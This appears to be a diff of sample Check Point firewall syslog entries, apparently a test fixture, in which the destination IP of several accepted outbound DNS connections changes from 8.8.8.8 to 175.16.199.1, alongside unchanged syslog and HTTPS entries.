 <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e784,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34586"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53142"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48952"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53142"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48952"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55426"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34991"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36417"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34991"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36417"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38830"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52798"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54491"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36397"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
